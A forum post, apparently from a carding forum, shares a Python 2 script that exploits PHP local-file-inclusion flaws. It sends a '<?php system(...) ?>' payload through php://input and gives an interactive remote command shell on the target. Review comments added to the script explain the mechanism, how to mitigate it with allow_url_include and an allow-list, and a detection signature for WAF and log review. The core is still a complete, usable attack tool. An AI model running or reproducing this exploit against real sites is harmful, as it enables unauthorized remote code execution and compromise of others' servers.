
View Full Version : RCE in LFI (php://input)



CardingMafia Admin
03-13-2013, 09:34 PM
#!/usr/bin/python
# Site: http://the-blackhats.blogspot.com
# Coder: MMxM
# Name: RCE in LFI {php://input}

from sys import argv,exit
import urllib2,re

# NOTE(review): the forum paste lost all indentation, so the nesting below is
# inferred from syntax only. The second raw_input() call is presumably the
# last statement of the while loop, and the print after it presumably follows
# the loop -- confirm against an original copy before relying on this.
#
# main() takes one command-line argument (a URL) and then loops: it reads a
# line from stdin, embeds it in a PHP system() call wrapped in the literal
# marker "mmxm", sends that as the request body, and prints whatever the
# response carries between the markers. Typing "exit" or pressing Ctrl-C ends
# the loop.
#
# Defender's view: this only has an effect against a PHP application that
# passes a request parameter straight into include/require, so that
# "php://input" (the raw request body) is evaluated as PHP. php://input is
# restricted by allow_url_include; keeping that setting off and resolving the
# page parameter against a fixed allow-list of files removes the vector.
def main():
try:
# Exactly one argument is required; otherwise print the banner and usage text
# and exit with status 0.
if len(argv) != 2:
print "\nRCE in LFI {php://input} by MMxM\n"
print "\nHow to use: %s <site>\nExample: %s localhost/?page=php://input\n" % (argv[0],argv[0])
exit(0)
url = argv[1]
# Only the first four characters are checked, so any argument not starting
# with "http" gets "http://" prepended.
if url[0:4] != "http":
url = "http://"+url
cmd = raw_input("$ ")
while (cmd != "exit"):
# Detection: the request body is a "<?php system(" payload between two "mmxm"
# markers, with stderr folded into stdout by "2> /dev/stdout". A body
# containing "<?php" sent to a URL whose query string contains "php://input"
# (as in the usage example) is a workable signature for WAF/IDS rules and
# for access-log review.
values = "mmxm<?php system(\"%s 2> /dev/stdout\"); ?>mmxm" % (cmd)
# Supplying a data argument makes urllib2 issue a POST. No headers are set, so
# urllib2's default User-Agent goes out with every request.
req = urllib2.Request(url, values)
response = urllib2.urlopen(req)
body = response.read()
# re.S lets "." span newlines; the greedy (.*) captures from the first marker
# to the last one found in the response body.
for m in re.findall('mmxm(.*)mmxm', body,re.S):
print m.rstrip('\n')
cmd = raw_input("$ ")
print "\r\n\nVisitem: http://the-blackhats.blogspot.com\n\n"
# Only Ctrl-C is handled (same banner as a normal exit); urllib2 errors are
# not caught in this function.
except (KeyboardInterrupt):
print "\r\n\nVisitem: http://the-blackhats.blogspot.com\n\n"

# Called unconditionally at module level (there is no __name__ guard), so the
# prompt loop starts as soon as the file is executed or imported.
main()